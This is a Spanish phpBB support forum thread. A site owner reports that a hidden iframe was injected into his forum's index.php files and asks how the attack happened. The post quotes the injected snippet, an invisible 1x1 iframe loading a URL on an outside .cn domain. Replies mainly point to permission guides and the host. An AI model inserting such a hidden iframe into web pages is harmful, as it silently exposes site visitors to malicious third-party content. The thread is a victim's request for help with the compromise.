Recordad que para pedir soporte alguno, debéis facilitar los datos de soporte oportunos por favor, mirad aquí y leer las Normas generales del foro, esto nos servirá de ayuda para dar el mejor soporte..
Gracias.
La Administración de phpBB España.
INYECCIÓN CÓDIGO EN INDEX.PHP
-
- Mensajes: 15
- Registrado: 13 May 2007, 12:23
INYECCIÓN CÓDIGO EN INDEX.PHP
Versión phpBB: phpBB3 (3.0.4)
MODs Instalados: Ninguno
Plantilla(s) usada(s): Black_Pearl
Servidor: Windows (de pago) - aruba.it
Actualización desde otra versión: No
Conversión desde otro sistema de foros: No
Buenas maestros,
estoy muy preocupado ya que ayer mismo terminé de instalar y configurar mi flamante nuevo foro phpbb 3.0.4 y esta mañana cuando he ido a visitarlo el navegador decía algo así como que faltaba un ? de cierre en index.php!!!
Cuál ha sido mi sorpresa cuando he comprobado que me han inyectado código en estos dos archivos:
/index.php
/includes/hooks/index.php
El código que han inyectado es un frame de publicidad:
?<html><body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola8" width=1 height=1 style="visibility: hidden"></iframe></body></html>>
Me preocupa muchísimo cómo lo han hecho. Me imagino que algo se me escapa o que quizá no haya terminado de cerrar los agujeros de seguridad. Los permisos de todas las carpetas del foro son 666 (¿Es correcto?)
Alguna idea de cómo lo han hecho?
Re: INYECCIÓN CÓDIGO EN INDEX.PHP
S@lu2
Raul [ThE KuKa] en phpBB
Jr. Extension Validator - Jr. Styles Validator - Style Customisations - Translator - International Support Team
Si te gustan mis estilos, traducciones, etc. y quieres mostrar algo de aprecio, no dudes en hacer una donación
phpBB España - En línea desde 2003
-
- Mensajes: 15
- Registrado: 13 May 2007, 12:23
Re: INYECCIÓN CÓDIGO EN INDEX.PHP
-
- Mensajes: 15
- Registrado: 13 May 2007, 12:23
Re: INYECCIÓN CÓDIGO EN INDEX.PHP
Re: INYECCIÓN CÓDIGO EN INDEX.PHP
Mira en el foro de guías de phpBB 3, contacta con Aruba y diles que permisos requiere cada carpeta y/o archivo.
S@lu2
Raul [ThE KuKa] en phpBB
Jr. Extension Validator - Jr. Styles Validator - Style Customisations - Translator - International Support Team
Si te gustan mis estilos, traducciones, etc. y quieres mostrar algo de aprecio, no dudes en hacer una donación
phpBB España - En línea desde 2003
Re: INYECCIÓN CÓDIGO EN INDEX.PHP
Der Mensch schuf Gott nach seinem eigenen Bild
Berlín siempre estará en mi corazón. Auf wiedersehen, Berlin!!